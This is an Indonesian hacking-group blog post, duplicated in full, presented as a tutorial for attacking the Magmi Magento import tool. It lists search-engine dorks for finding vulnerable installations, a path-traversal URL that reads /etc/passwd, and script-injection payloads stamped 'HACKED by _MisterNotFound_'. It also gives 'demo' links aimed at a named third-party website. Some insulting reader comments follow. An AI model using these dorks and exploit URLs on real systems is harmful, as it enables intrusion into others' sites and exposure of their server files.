Hai ART-Team family :)
Kali ini saya mo ngasi tutor yg ane sendiri masih bingung gunainnya >_<
[+] DORK :
inurl:/media/magmi/magmi/web/
inurl:/web/magmi_import_run.php
inurl:/old-site/magmi/web/
inurl:/magmi/web/magmi.php?
index of /media/magmi/magmi/web/css/
[+] VULN :
[+] EXPLOIT LFI :
www.NDAS.mu/[path]/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] EXPLOIT XSS :
www.NDAS.mu/[path]/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
www.NDAS.mu/[path]/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
[+] DEMO LFI :
http://www.gooddrop.com.au/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] DEMO XSS :
http://www.gooddrop.com.au/media/magmi/magmi/web/magmi_import_run.php?%3C%2Fscript%3E%3Cscript%3Ealert%28%27HACKED+by+_MisterNotFound_%27%29%3B%3C%2Fscript%3E
Sekian tutorial dari _MisterNotFound_
Selamat menjalani ibadah puasa Ramadhan ;)
Jangan lupa untuk like fanspage tim kami di facebook ;)
Terimakasih.
Wassalamualaikum Wr. Wb.
Penulis : _MisterNotFound_
Kali ini saya mo ngasi tutor yg ane sendiri masih bingung gunainnya >_<
[+] DORK :
inurl:/media/magmi/magmi/web/
inurl:/web/magmi_import_run.php
inurl:/old-site/magmi/web/
inurl:/magmi/web/magmi.php?
index of /media/magmi/magmi/web/css/
[+] VULN :
[+] EXPLOIT LFI :
www.NDAS.mu/[path]/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] EXPLOIT XSS :
www.NDAS.mu/[path]/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
www.NDAS.mu/[path]/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
[+] DEMO LFI :
http://www.gooddrop.com.au/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] DEMO XSS :
http://www.gooddrop.com.au/media/magmi/magmi/web/magmi_import_run.php?%3C%2Fscript%3E%3Cscript%3Ealert%28%27HACKED+by+_MisterNotFound_%27%29%3B%3C%2Fscript%3E
Sekian tutorial dari _MisterNotFound_
Selamat menjalani ibadah puasa Ramadhan ;)
Jangan lupa untuk like fanspage tim kami di facebook ;)
Terimakasih.
Wassalamualaikum Wr. Wb.
Penulis : _MisterNotFound_
5 comments
commentsgan gak faham
Replyblog kontol gak jelas mau pamer ato apaan lu
ReplyLu tol gapaham gblk
Replyyang bener dong om
Replyyang bener dong om
Reply